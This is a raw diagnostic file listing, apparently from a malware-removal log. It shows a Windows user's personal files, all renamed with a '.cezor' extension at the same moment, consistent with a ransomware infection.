    2019-07-09 15:36 - 2018-07-30 15:01 - 000437839 _____ C:\Users\ADMIN\Downloads\5TpxWkLNZIN5uFaFmfGieHIih_X9FsSlpmD_RVineRY.jpg.cezor
    2019-07-09 15:36 - 2018-07-29 13:26 - 000147364 _____ C:\Users\ADMIN\Downloads\download (16).png.cezor
    2019-07-09 15:36 - 2018-07-29 13:24 - 000044559 _____ C:\Users\ADMIN\Downloads\download (15).png.cezor
    2019-07-09 15:36 - 2018-07-29 13:22 - 000043700 _____ C:\Users\ADMIN\Downloads\download (14).png.cezor
    2019-07-09 15:36 - 2018-07-25 20:43 - 000087559 _____ C:\Users\ADMIN\Downloads\download (13).png.cezor
    2019-07-09 15:36 - 2018-07-25 16:09 - 000622157 _____ C:\Users\ADMIN\Documents\BABY BOY.docx.cezor
    2019-07-09 15:36 - 2018-07-25 16:07 - 000082066 _____ C:\Users\ADMIN\Downloads\download (12).png.cezor
    2019-07-09 15:36 - 2018-07-25 16:06 - 000083211 _____ C:\Users\ADMIN\Downloads\download (11).png.cezor
    2019-07-09 15:36 - 2018-07-25 16:03 - 000091357 _____ C:\Users\ADMIN\Downloads\download (10).png.cezor
    2019-07-09 15:36 - 2018-07-25 16:02 - 000071378 _____ C:\Users\ADMIN\Downloads\download (9).png.cezor
    2019-07-09 15:36 - 2018-07-25 15:38 - 000009691 _____ C:\Users\ADMIN\Downloads\download (8).png.cezor
    2019-07-09 15:36 - 2018-07-25 15:26 - 000029201 _____ C:\Users\ADMIN\Downloads\8bit-aesthetics-blue-galaxy-Favim.com-3807349.jpg.cezor
    2019-07-09 15:36 - 2018-07-19 19:45 - 000548955 _____ C:\Users\ADMIN\Downloads\jesc105.pdf.cezor
    2019-07-09 15:36 - 2018-07-19 16:36 - 000822406 _____ C:\Users\ADMIN\Downloads\RobloxPlayerLauncher (6).exe.cezor
    2019-07-09 15:36 - 2018-07-19 16:34 - 000822406 _____ C:\Users\ADMIN\Downloads\RobloxPlayerLauncher (5).exe.cezor
    2019-07-09 15:36 - 2018-07-16 20:38 - 000078902 _____ C:\Users\ADMIN\Downloads\cf5db942ed46743260c9c7f4a30f28bb--yellow-art-yellow-walls.jpg.cezor
    2019-07-09 15:36 - 2018-07-16 20:37 - 000012874 _____ C:\Users\ADMIN\Downloads\3998c2fb76f538050fbda38fb987ed7b.jpg.cezor
    2019-07-09 15:36 - 2018-07-16 20:34 - 000022858 _____ C:\Users\ADMIN\Downloads\6e334765f5d8c8aea0d08420a127ca01.jpg.cezor
    2019-07-09 15:36 - 2018-07-16 20:32 - 000205056 _____ C:\Users\ADMIN\Downloads\large.png.cezor
    2019-07-09 15:36 - 2018-07-16 20:30 - 000064483 _____ C:\Users\ADMIN\Downloads\med_1484903818_image.jpg.cezor
    2019-07-09 15:36 - 2018-07-16 14:37 - 000148861 _____ C:\Users\ADMIN\Downloads\download (7).png.cezor
    2019-07-09 15:36 - 2018-07-16 14:36 - 000098594 _____ C:\Users\ADMIN\Documents\Doc2.docx.cezor
    2019-07-09 15:36 - 2018-07-16 14:11 - 000051694 _____ C:\Users\ADMIN\Downloads\download (6).png.cezor
    2019-07-09 15:36 - 2018-07-16 14:10 - 000100235 _____ C:\Users\ADMIN\Documents\きくらとかといち1.docx.cezor
    2019-07-09 15:36 - 2018-07-16 14:00 - 000017106 _____ C:\Users\ADMIN\Downloads\download (5).png.cezor
    2019-07-09 15:36 - 2018-07-16 13:49 - 000011961 _____ C:\Users\ADMIN\Documents\きくらとかといちり.docx.cezor
    2019-07-09 15:36 - 2018-07-16 13:19 - 000232157 _____ C:\Users\ADMIN\Documents\Doc1.docx.cezor
    2019-07-09 15:36 - 2018-07-16 13:13 - 000087365 _____ C:\Users\ADMIN\Downloads\DependableAshamedBrocketdeer-max-1mb.gif.cezor
    2019-07-09 15:36 - 2018-07-16 13:13 - 000065884 _____ C:\Users\ADMIN\Downloads\kawaii-transparent-pixel-art_183455.gif.cezor
    2019-07-09 15:36 - 2018-07-05 16:27 - 000822406 _____ C:\Users\ADMIN\Downloads\RobloxPlayerLauncher (4).exe.cezor
    2019-07-09 15:36 - 2018-07-04 17:01 - 000037256 _____ C:\Users\ADMIN\Downloads\fa78b24a59622545103399784a7d0e1d--wishing-well-poems-wishing-well-diy.jpg.cezor
    2019-07-09 15:36 - 2018-07-04 15:27 - 000822406 _____ C:\Users\ADMIN\Downloads\RobloxPlayerLauncher (3).exe.cezor
    2019-07-09 15:36 - 2018-07-04 15:24 - 000822406 _____ C:\Users\ADMIN\Downloads\RobloxPlayerLauncher (2).exe.cezor
    2019-07-09 15:36 - 2018-05-30 19:58 - 000000957 _____ C:\Users\ADMIN\Downloads\download (4).png.cezor
    2019-07-09 15:36 - 2018-05-30 19:57 - 000004071 _____ C:\Users\ADMIN\Downloads\download (3).png.cezor
    2019-07-09 15:36 - 2018-05-30 19:44 - 000053756 _____ C:\Users\ADMIN\Downloads\download (1).png.cezor
    2019-07-09 15:36 - 2018-05-30 19:44 - 000042012 _____ C:\Users\ADMIN\Downloads\download (2).png.cezor
    2019-07-09 15:36 - 2018-05-30 16:14 - 000300386 _____ C:\Users\ADMIN\Downloads\download.png.cezor
    2019-07-09 15:36 - 2018-05-20 16:35 - 000148611 _____ C:\Users\ADMIN\Downloads\Listen-I-Could-Go-You-Get-Point-Now-Right.jpg.cezor
    2019-07-09 15:36 - 2018-05-13 13:31 - 000004706 _____ C:\Users\ADMIN\Downloads\17352857_418896838459053_1963206290_n.jpg.cezor
    2019-07-09 15:36 - 2018-05-12 15:53 - 004685329 _____ C:\Users\ADMIN\Downloads\Nightcore - Rather Be.mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:52 - 004424522 _____ C:\Users\ADMIN\Downloads\Nightcore - Stereo heart.mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:50 - 005799399 _____ C:\Users\ADMIN\Downloads\Nightcore - Clarity.mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:50 - 005450194 _____ C:\Users\ADMIN\Downloads\Nightcore - Counting Stars.mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:49 - 004682821 _____ C:\Users\ADMIN\Downloads\Nightcore - Centuries.mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:48 - 004630158 _____ C:\Users\ADMIN\Downloads\Nightcore - Angel With A Shotgun.mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:46 - 004100395 _____ C:\Users\ADMIN\Downloads\Nightcore - Hall of Fame.mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:45 - 003902282 _____ C:\Users\ADMIN\Downloads\Nightcore - Symphony - (Lyrics).mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:43 - 003615771 _____ C:\Users\ADMIN\Downloads\Nightcore - Im Not Her - (Lyrics).mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:36 - 005090958 _____ C:\Users\ADMIN\Downloads\BTS (방탄소년단) LOVE YOURSELF 轉 Tear Singularity Comeback Trailer.mp3.cezor
    2019-07-09 15:36 - 2018-05-11 16:41 - 000023260 _____ C:\Users\ADMIN\Downloads\ff27e9d10225288881a08df9f7b263a0398edc5f_hq.jpg.cezor
    2019-07-09 15:36 - 2018-04-19 17:21 - 000003706 _____ C:\Users\ADMIN\Downloads\Ot9b06J.png.cezor
    2019-07-09 15:36 - 2018-04-16 15:41 - 000191749 _____ C:\Users\ADMIN\Downloads\kageyama-intimidating.png.cezor
    2019-07-09 15:36 - 2018-04-04 17:39 - 000372966 _____ C:\Users\ADMIN\Downloads\free_to_use_vines_and_plants_red_gem_divider_by_sinisterparakeet-dbug64s.png.cezor
    2019-07-09 15:36 - 2018-04-04 12:39 - 000081807 _____ C:\Users\ADMIN\Downloads\imageedit_1_5184723339.png.cezor
    2019-07-09 15:36 - 2018-03-29 16:53 - 005159662 _____ C:\Users\ADMIN\Downloads\Detection.exe.cezor
    2019-07-09 15:36 - 2018-03-29 13:23 - 075353102 _____ C:\Users\ADMIN\Downloads\InstallPaladins.exe.cezor
    2019-07-09 15:36 - 2018-03-09 20:43 - 000081776 _____ C:\Users\ADMIN\Downloads\oZe4FA95mwY.swf.cezor
    2019-07-09 15:36 - 2018-02-28 21:07 - 001129894 _____ C:\Users\ADMIN\Downloads\ChromeSetup.exe.cezor
    2019-07-09 15:36 - 2018-02-26 18:52 - 019981086 _____ C:\Users\ADMIN\Downloads\GTA_V_Launcher_1_0_1290_2 (1).exe.cezor
    2019-07-09 15:36 - 2018-02-25 17:32 - 029562471 _____ C:\Users\ADMIN\Downloads\Book (IT Level-1 New).pdf.cezor
    2019-07-09 15:36 - 2018-02-25 16:12 - 001519037 _____ C:\Users\ADMIN\Downloads\NVEQ SWB IT L1 U2 Funda of Computer.pdf11_04_2013_12_07_36.pdf.cezor
    2019-07-09 15:36 - 2018-02-18 12:39 - 019981086 _____ C:\Users\ADMIN\Downloads\GTA_V_Launcher_1_0_1290_2.exe.cezor
    2019-07-09 15:36 - 2018-02-10 16:49 - 001231570 _____ C:\Users\ADMIN\Downloads\katarina_wallpaper_by_katlynarts-d790bhc.png.cezor
    2019-07-09 15:36 - 2018-02-10 16:48 - 001257631 _____ C:\Users\ADMIN\Downloads\katarina-lol-girl-hd-wallpaper-1920x1200.jpg.cezor
    2019-07-09 15:36 - 2018-01-14 20:43 - 000947441 _____ C:\Users\ADMIN\Downloads\cGnMWZkjTJGzhGYmLzFecw (1).png.cezor
    2019-07-09 15:36 - 2018-01-13 12:38 - 000899368 _____ C:\Users\ADMIN\Downloads\libcrypto-1_1.zip.cezor
    2019-07-09 15:36 - 2017-12-10 13:28 - 000127744 _____ C:\Users\ADMIN\Downloads\DLxs3EOPQsecB89NdNEgcA.png.cezor
    2019-07-09 15:36 - 2017-12-10 13:28 - 000031961 _____ C:\Users\ADMIN\Downloads\EL_rPK2uREOWEVTqIcLEPw.png.cezor
    2019-07-09 15:36 - 2017-12-07 18:28 - 000108494 _____ C:\Users\ADMIN\Downloads\shadow.jpg.cezor
    2019-07-09 15:36 - 2017-11-21 17:26 - 000016555 _____ C:\Users\ADMIN\Documents\too old for toys.docx.cezor
    2019-07-09 15:36 - 2017-11-20 18:52 - 000014483 _____ C:\Users\ADMIN\Documents\A tiger for a pet.docx.cezor
    2019-07-09 15:36 - 2017-11-20 18:26 - 000019579 _____ C:\Users\ADMIN\Documents\isaac NEWTOn.docx.cezor
    2019-07-09 15:36 - 2017-11-12 20:21 - 000574802 _____ C:\Users\ADMIN\Downloads\cooooover.png.cezor
    2019-07-09 15:36 - 2017-11-12 20:20 - 000575609 _____ C:\Users\ADMIN\Downloads\coooover.png.cezor
    2019-07-09 15:36 - 2017-11-12 20:19 - 000681734 _____ C:\Users\ADMIN\Downloads\cooover.png.cezor
    2019-07-09 15:36 - 2017-11-12 20:16 - 000750450 _____ C:\Users\ADMIN\Downloads\coover.png.cezor
    2019-07-09 15:36 - 2017-11-12 19:16 - 000001963 _____ C:\Users\ADMIN\Downloads\hurtmold.regular.png.cezor
    2019-07-09 15:36 - 2017-11-12 19:12 - 000002710 _____ C:\Users\ADMIN\Downloads\expressway-free.regular.png.cezor
    2019-07-09 15:36 - 2017-11-12 19:09 - 000003402 _____ C:\Users\ADMIN\Downloads\dodge.dodge.png.cezor
    2019-07-09 15:36 - 2017-11-12 19:03 - 000007334 _____ C:\Users\ADMIN\Downloads\divider.png.cezor
    2019-07-09 15:36 - 2017-11-12 18:59 - 000006670 _____ C:\Users\ADMIN\Downloads\0e74c6c1949606bd43be7143b28a6de1.png.cezor
    2019-07-09 15:36 - 2017-11-12 18:58 - 000003088 _____ C:\Users\ADMIN\Downloads\d2b0905c18a898f49c9ea96704ff1429.png.cezor
    2019-07-09 15:36 - 2017-11-12 18:53 - 000014368 _____ C:\Users\ADMIN\Downloads\52b5d67727aa9542321899ea20790b1b.png.cezor
    2019-07-09 15:36 - 2017-11-12 18:50 - 000005582 _____ C:\Users\ADMIN\Downloads\4e185e2fbe92d3d6b0a99b0ee273fb46.png.cezor
    2019-07-09 15:36 - 2017-11-12 18:49 - 000009039 _____ C:\Users\ADMIN\Downloads\c012b0a1e6285032f9278ab399c92be7.png.cezor
    2019-07-09 15:36 - 2017-11-12 18:34 - 001178983 _____ C:\Users\ADMIN\Downloads\autumn-leaves-wallpapers-with-yellow-color-leaves-beautiful-autumn-wallpaper-for-interior-wall-decor-idea-fall-scenery-backgrounds-fall-leaves-desktop-wallpaper-free-autumn-desktop.jpg.cezor
    2019-07-09 15:36 - 2017-11-12 18:30 - 000090056 _____ C:\Users\ADMIN\Downloads\color-combo-17-tb-662x0.webp.cezor
    2019-07-09 15:36 - 2017-11-12 12:06 - 000370174 _____ C:\Users\ADMIN\Downloads\bokeh-lights-sunset-city-hd-wallpaper.jpg.cezor
    2019-07-09 15:36 - 2017-11-12 12:00 - 000326819 _____ C:\Users\ADMIN\Downloads\nature_insects_butterflies_gradient_1.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:53 - 001082328 _____ C:\Users\ADMIN\Downloads\523014911-floral-design-hi.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:48 - 000003566 _____ C:\Users\ADMIN\Downloads\libel-suit.regular (1).png.cezor
    2019-07-09 15:36 - 2017-11-12 11:46 - 000016830 _____ C:\Users\ADMIN\Downloads\ea2e470bbdc42d1256382353fc552459.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:45 - 000026780 _____ C:\Users\ADMIN\Downloads\97abb9ec0591ad8f91ba84faa9c4bb8e.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:42 - 000045464 _____ C:\Users\ADMIN\Downloads\coming-soon-fancy-gold-divider-top-of-page (1).png.cezor
    2019-07-09 15:36 - 2017-11-12 11:41 - 000004149 _____ C:\Users\ADMIN\Downloads\sg-alternative.high-alt.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:36 - 000011604 _____ C:\Users\ADMIN\Downloads\97ad3dc350d8eddc7ff38127168caab0.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:34 - 000011923 _____ C:\Users\ADMIN\Downloads\95ccf1284a5786b412fc36cbd0d5ea56.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:27 - 000045464 _____ C:\Users\ADMIN\Downloads\coming-soon-fancy-gold-divider-top-of-page.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:27 - 000034979 _____ C:\Users\ADMIN\Downloads\divider (2).png.cezor
    2019-07-09 15:36 - 2017-11-12 11:27 - 000004490 _____ C:\Users\ADMIN\Downloads\Golden--divider.png.cezor
    2019-07-09 15:36 - 2017-11-09 17:14 - 000134168 _____ C:\Users\ADMIN\Downloads\scrollwork_10_gold_by_victorian_lady-dah7mex.png.cezor
    2019-07-09 15:36 - 2017-11-09 17:14 - 000085636 _____ C:\Users\ADMIN\Downloads\Gold-Border-Frame-Transparent-PNG.png.cezor
    2019-07-09 15:36 - 2017-11-09 17:14 - 000030752 _____ C:\Users\ADMIN\Downloads\fec1c7c3f2e4a3980ee5466dc7b96ed5.jpg.cezor
    2019-07-09 15:36 - 2017-11-09 17:13 - 000092835 _____ C:\Users\ADMIN\Downloads\gold-cool-border-hi.png.cezor
    2019-07-09 15:36 - 2017-11-09 17:11 - 002242906 _____ C:\Users\ADMIN\Downloads\4d1442bd6c1ab961e1fdb99498c10bfc.jpg.cezor
    2019-07-09 15:36 - 2017-11-08 18:01 - 000001369 _____ C:\Users\ADMIN\Downloads\promo-gradient-border.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:57 - 000408564 _____ C:\Users\ADMIN\Downloads\Blue-Border-Frame-Transparent-PNG.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:57 - 000172928 _____ C:\Users\ADMIN\Downloads\Light-blue-artistic-loop-triangle-rectangular-powerpoint-border.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:55 - 000014398 _____ C:\Users\ADMIN\Downloads\457824793.jpg.cezor
    2019-07-09 15:36 - 2017-11-08 17:38 - 000002183 _____ C:\Users\ADMIN\Downloads\neuropolitical.regular.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:33 - 000022210 _____ C:\Users\ADMIN\Downloads\f0c0efae129388d51aaa437447be577c.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:33 - 000017744 _____ C:\Users\ADMIN\Downloads\e4fd3334856cef20457d35524a54a025.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:32 - 000038231 _____ C:\Users\ADMIN\Downloads\340eb86b4460abb695f6b7f8a3ca5527.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:26 - 000004718 _____ C:\Users\ADMIN\Downloads\pakenham-free.regular (1).png.cezor
    2019-07-09 15:36 - 2017-11-08 17:24 - 000004045 _____ C:\Users\ADMIN\Downloads\pakenham-free.regular.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:10 - 000010417 _____ C:\Users\ADMIN\Downloads\american-text.regular (1).png.cezor
    2019-07-09 15:36 - 2017-11-08 17:09 - 000061782 _____ C:\Users\ADMIN\Downloads\logo.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:07 - 000003540 _____ C:\Users\ADMIN\Downloads\libel-suit.regular.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:01 - 000011517 _____ C:\Users\ADMIN\Downloads\american-text.regular.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:00 - 000035346 _____ C:\Users\ADMIN\Downloads\american-text.regular.ttf.cezor
    2019-07-09 15:36 - 2017-11-08 16:52 - 000384954 _____ C:\Users\ADMIN\Downloads\border-in-blue.png.cezor
    2019-07-09 15:36 - 2017-11-08 16:52 - 000239921 _____ C:\Users\ADMIN\Downloads\Osmosis.png.cezor
    2019-07-09 15:36 - 2017-11-08 16:52 - 000025613 _____ C:\Users\ADMIN\Downloads\blue-corner-page-border-clipart.gif.cezor
    2019-07-09 15:36 - 2017-11-08 16:51 - 000039072 _____ C:\Users\ADMIN\Downloads\fancy-page-title-border3.png.cezor
    2019-07-09 15:36 - 2017-11-08 16:50 - 000259278 _____ C:\Users\ADMIN\Downloads\bright-wallpaper-2330-2493-hd-wallpapers.jpg.cezor
    2019-07-09 15:36 - 2017-11-08 16:50 - 000046203 _____ C:\Users\ADMIN\Downloads\bb437b407d965c77a202bac20551e8a7.png.cezor
    2019-07-09 15:36 - 2017-11-08 16:49 - 000020384 _____ C:\Users\ADMIN\Downloads\1.jpg.cezor
    2019-07-09 15:36 - 2017-11-07 19:56 - 000146280 _____ C:\Users\ADMIN\Downloads\9 (1).pdf.cezor
    2019-07-09 15:36 - 2017-11-07 19:55 - 000266220 _____ C:\Users\ADMIN\Downloads\9.pdf.cezor
    2019-07-09 15:36 - 2017-10-31 12:03 - 000094201 _____ C:\Users\ADMIN\Downloads\fanart.jpg.cezor
    2019-07-09 15:36 - 2017-10-30 16:09 - 032002126 _____ C:\Users\ADMIN\Downloads\EpicInstaller-6.7.0-fortnite-47840d2b1a5d4923badaae639b1d03a2.msi.cezor
    2019-07-09 15:36 - 2017-10-01 16:58 - 000268803 _____ C:\Users\ADMIN\Downloads\pi.pdf.cezor
    2019-07-09 15:36 - 2017-10-01 14:08 - 000055990 _____ C:\Users\ADMIN\Downloads\prook1.jpg.cezor
    2019-07-09 15:36 - 2017-10-01 14:08 - 000010526 _____ C:\Users\ADMIN\Downloads\proook.jpg.cezor
    2019-07-09 15:36 - 2017-10-01 14:03 - 000455455 _____ C:\Users\ADMIN\Downloads\prook.jpg.cezor
    2019-07-09 15:36 - 2017-09-29 20:23 - 000057592 _____ C:\Users\ADMIN\Downloads\dudey.jpg.cezor
    2019-07-09 15:36 - 2017-09-29 20:22 - 000007988 _____ C:\Users\ADMIN\Downloads\dude.jpg.cezor
    2019-07-09 15:36 - 2017-09-28 20:33 - 000498139 _____ C:\Users\ADMIN\Downloads\fi.pdf.cezor
    2019-07-09 15:36 - 2017-09-28 11:59 - 000029634 _____ C:\Users\ADMIN\Downloads\blood.jpg.cezor
    2019-07-09 15:36 - 2017-09-26 20:52 - 009473479 _____ C:\Users\ADMIN\Downloads\apache-tomcat-7.0.57.zip.cezor
    2019-07-09 15:36 - 2017-09-26 15:03 - 000080339 _____ C:\Users\ADMIN\Downloads\coollooking.jpg.cezor
    2019-07-09 15:36 - 2017-09-26 13:47 - 000010656 _____ C:\Users\ADMIN\Downloads\lolol.jpg.cezor
    2019-07-09 15:36 - 2017-09-26 13:45 - 000009660 _____ C:\Users\ADMIN\Downloads\poop.jpg.cezor
    2019-07-09 15:36 - 2017-09-25 15:22 - 000037237 _____ C:\Users\ADMIN\Downloads\poo.jpg.cezor
    2019-07-09 15:36 - 2017-09-25 11:32 - 000361245 _____ C:\Users\ADMIN\Downloads\5a988f6f29d54162cfd205c28ecd971f.jpg.cezor
    2019-07-09 15:36 - 2017-09-23 21:41 - 000094201 _____ C:\Users\ADMIN\Downloads\cool.jpg.cezor
    2019-07-09 15:36 - 2017-09-23 18:28 - 001450151 _____ C:\Users\ADMIN\Downloads\hi.jpg.cezor
    2019-07-09 15:36 - 2017-09-23 18:18 - 000158760 _____ C:\Users\ADMIN\Downloads\douknwomyname.jpg.cezor
    2019-07-09 15:36 - 2017-09-23 18:16 - 000806630 _____ C:\Users\ADMIN\Downloads\prolol.jpg.cezor
    2019-07-09 15:36 - 2017-09-23 18:16 - 000266019 _____ C:\Users\ADMIN\Downloads\prolollll.jpg.cezor
    2019-07-09 15:36 - 2017-09-23 13:37 - 000052482 _____ C:\Users\ADMIN\Downloads\produde.jpg.cezor
    2019-07-09 15:36 - 2017-09-23 12:03 - 000009163 _____ C:\Users\ADMIN\Downloads\produh.jpg.cezor
    2019-07-09 15:36 - 2017-09-22 15:17 - 000018022 _____ C:\Users\ADMIN\Downloads\kraken.jpg.cezor
    2019-07-09 15:36 - 2017-09-21 13:24 - 000040195 _____ C:\Users\ADMIN\Downloads\gullivers-travels-part-1-chapter-2-questions-and-answers.pdf.cezor
    2019-07-09 15:36 - 2017-09-21 12:30 - 000056191 _____ C:\Users\ADMIN\Downloads\jade-dragon.png.cezor
    2019-07-09 15:36 - 2017-09-21 12:25 - 000296251 _____ C:\Users\ADMIN\Downloads\dragon.jpg.cezor
    2019-07-09 15:36 - 2017-09-11 19:15 - 000211629 _____ C:\Users\ADMIN\Downloads\Chapter-2(FIT9).pdf.cezor
    2019-07-09 15:36 - 2017-09-11 19:12 - 000000243 ____H C:\Users\ADMIN\Desktop\~$New Microsoft Excel Worksheet.xlsx.cezor
    2019-07-09 15:36 - 2017-05-26 12:59 - 000010198 _____ C:\Users\ADMIN\Downloads\be39ac5b7c3144cf902820b997f5a7a7.png.cezor
    2019-07-09 15:36 - 2017-03-16 12:51 - 000006921 _____ C:\Users\ADMIN\Downloads\hqdefault (2).jpg.cezor
    2019-07-09 15:36 - 2017-03-16 12:49 - 000012828 _____ C:\Users\ADMIN\Downloads\hqdefault (1).jpg.cezor
    2019-07-09 15:36 - 2017-03-16 12:49 - 000009798 _____ C:\Users\ADMIN\Downloads\hqdefault.jpg.cezor
    2019-07-09 15:36 - 2017-03-16 12:49 - 000006611 _____ C:\Users\ADMIN\Downloads\images.jpg.cezor
    2019-07-09 15:36 - 2017-03-02 13:03 - 000250896 _____ C:\Users\ADMIN\Downloads\FIFA 17 Downloader.rar.cezor
    2019-07-09 15:36 - 2017-01-29 15:31 - 001056443 _____ C:\Users\ADMIN\Downloads\719053.jpg.cezor
    2019-07-09 15:36 - 2017-01-29 14:31 - 000289302 _____ C:\Users\ADMIN\Downloads\lol.jpg.cezor
    2019-07-09 15:36 - 2017-01-29 14:27 - 000406492 _____ C:\Users\ADMIN\Downloads\league of legends.png.cezor
    2019-07-09 15:36 - 2017-01-29 14:22 - 000008966 _____ C:\Users\ADMIN\Downloads\katarina.jpg.cezor
    2019-07-09 15:36 - 2017-01-28 20:13 - 000701397 _____ C:\Users\ADMIN\Downloads\160930_(1).jpg.cezor
    2019-07-09 15:36 - 2017-01-04 14:51 - 001940796 _____ C:\Users\ADMIN\Downloads\OptiFine_1.11_HD_U_B1.jar.cezor
    2019-07-09 15:36 - 2017-01-04 10:37 - 000012182 _____ C:\Users\ADMIN\Downloads\goku3.jpg.cezor
    2019-07-09 15:36 - 2017-01-03 11:14 - 000392529 _____ C:\Users\ADMIN\Downloads\6671310569e247dea170821338886a6a.png.cezor
    2019-07-09 15:36 - 2017-01-03 11:04 - 000776438 _____ C:\Users\ADMIN\Downloads\blush.png.cezor
    2019-07-09 15:36 - 2017-01-02 21:13 - 003372328 _____ C:\Users\ADMIN\Downloads\BTS - I NEED U (Official Instrumental) +Karaoke.mp3.cezor
    2019-07-09 15:36 - 2017-01-02 21:11 - 002905344 _____ C:\Users\ADMIN\Downloads\i need u.mp3.cezor
    2019-07-09 15:36 - 2016-12-29 16:47 - 000017230 _____ C:\Users\ADMIN\Downloads\MCLeaksAuthenticator (3).zip.cezor
    2019-07-09 15:36 - 2016-12-29 16:47 - 000017230 _____ C:\Users\ADMIN\Downloads\MCLeaksAuthenticator (2).zip.cezor
    2019-07-09 15:36 - 2016-12-29 16:45 - 000017230 _____ C:\Users\ADMIN\Downloads\MCLeaksAuthenticator (1).zip.cezor
    2019-07-09 15:36 - 2016-12-29 16:17 - 000061006 _____ C:\Users\ADMIN\Downloads\MCLeaksAuthenticator.exe.cezor
    2019-07-09 15:36 - 2016-12-29 16:14 - 000017230 _____ C:\Users\ADMIN\Downloads\MCLeaksAuthenticator.zip.cezor
    2019-07-09 15:36 - 2016-12-29 14:22 - 000011065 _____ C:\Users\ADMIN\Downloads\goku 2.jpg.cezor
    2019-07-09 15:36 - 2016-12-29 12:44 - 000003458 _____ C:\Users\ADMIN\Downloads\goku.jpg.cezor
    2019-07-09 15:36 - 2016-12-14 16:11 - 000377943 _____ C:\Users\ADMIN\Downloads\b7e7c5a77bd54c10a753ad654d945923.png.cezor
    2019-07-09 15:36 - 2016-12-14 16:02 - 000401435 _____ C:\Users\ADMIN\Downloads\da26755f9a5b4e2b9ffbde621bc65ecf.png.cezor
    2019-07-09 15:36 - 2016-12-13 22:04 - 000033176 _____ C:\Users\ADMIN\Downloads\fc846a7a917f47b6b99962387aa9f317.png.cezor
    2019-07-09 15:36 - 2016-12-13 21:52 - 000004321 _____ C:\Users\ADMIN\Downloads\beatingheart.gif-c200.cezor
    2019-07-09 15:36 - 2016-12-13 21:51 - 000612598 _____ C:\Users\ADMIN\Downloads\48a560c8785d4aa1a30e9d36a902d5b5.png.cezor
    2019-07-09 15:36 - 2016-12-13 21:51 - 000009411 _____ C:\Users\ADMIN\Downloads\200_s.gif.cezor
    2019-07-09 15:36 - 2016-12-12 21:23 - 000126852 _____ C:\Users\ADMIN\Downloads\e6e15aeb77fd4446885de2382813dc19.jpg.cezor
    2019-07-09 15:36 - 2016-12-12 21:19 - 000013719 _____ C:\Users\ADMIN\Downloads\6c72fed907ca4513a7a9f425864fd997.png.cezor
    2019-07-09 15:36 - 2016-12-12 21:17 - 000281958 _____ C:\Users\ADMIN\Downloads\46cb3c041b554b50acd2e8aa1f5f71d9.png.cezor
    2019-07-09 15:36 - 2016-12-12 21:17 - 000015449 _____ C:\Users\ADMIN\Downloads\11123946_921374211239806_1915697730_n.jpg.cezor
    2019-07-09 15:36 - 2016-12-11 20:46 - 003162513 _____ C:\Users\ADMIN\Downloads\BLACKPINK – Playing With Fire (불장난) [Color Coded Lyrics] (ENG-ROM-HAN).mp3.cezor
    2019-07-09 15:36 - 2016-12-08 13:29 - 000027409 _____ C:\Users\ADMIN\Downloads\crocodile.png.cezor
    2019-07-09 15:36 - 2016-12-08 13:22 - 000081582 _____ C:\Users\ADMIN\Downloads\aer.png.cezor
    2019-07-09 15:36 - 2016-11-14 13:28 - 000192428 _____ C:\Users\ADMIN\Downloads\1e5545f3ff3cc693a69d1968b17364a5.jpg.cezor
    2019-07-09 15:36 - 2016-11-14 13:17 - 000434878 _____ C:\Users\ADMIN\Downloads\c3ee13ad72a14680ac74cd3fc74e195a.png.cezor
    2019-07-09 15:36 - 2016-11-14 13:17 - 000060773 _____ C:\Users\ADMIN\Downloads\caughtonjupiter.69165.jpg.cezor
    2019-07-09 15:36 - 2016-09-10 12:25 - 003203473 _____ C:\Users\ADMIN\Downloads\Sever The Ties After Dawn (Goblin Mixes & Crystal Mashup).mp3.cezor
    2019-07-09 15:36 - 2016-09-07 09:17 - 000043706 _____ C:\Users\ADMIN\Downloads\07a67d6173ff47d21b455a152d1d87b1c101dcfc_hq.jpg.cezor
    2019-07-09 15:36 - 2016-08-28 14:08 - 000348238 _____ C:\Users\ADMIN\Documents\Database1.accdb.cezor
    2019-07-09 15:36 - 2016-08-27 14:03 - 000013676 _____ C:\Users\ADMIN\Downloads\13643511_1588688208097065_409010221_n.jpg.cezor
    2019-07-09 15:36 - 2016-08-27 14:03 - 000005995 _____ C:\Users\ADMIN\Downloads\eJwNy81ugjAAAOB34bDb-JFB1cQsZKjgoBXiRLwQRSgFhELLKCx79-27fz_S0NfSWio4p2ytKOR5wxl71eQHYWnbP26Uyk3GFTk7jHCaVTROlh-gPUgt2zo0CYw-K8eEbd2SgLg7twRbcQYr0N6vifo9UBamWrczq-Ue-E-bh9H85UGhak5b48VFHPvAzcX_YiKJQ4gxiq84Lbfo6KND5QF6HVA.jpg.cezor
    2019-07-09 15:36 - 2016-08-18 10:26 - 000013691 _____ C:\Users\ADMIN\Downloads\pink-crown.svg.cezor
    2019-07-09 15:36 - 2016-08-11 14:16 - 001743209 _____ C:\Users\ADMIN\Downloads\IMG_20160810_192333161 (1).jpg.cezor
    2019-07-09 15:36 - 2016-08-11 14:14 - 001743209 _____ C:\Users\ADMIN\Downloads\IMG_20160810_192333161.jpg.cezor
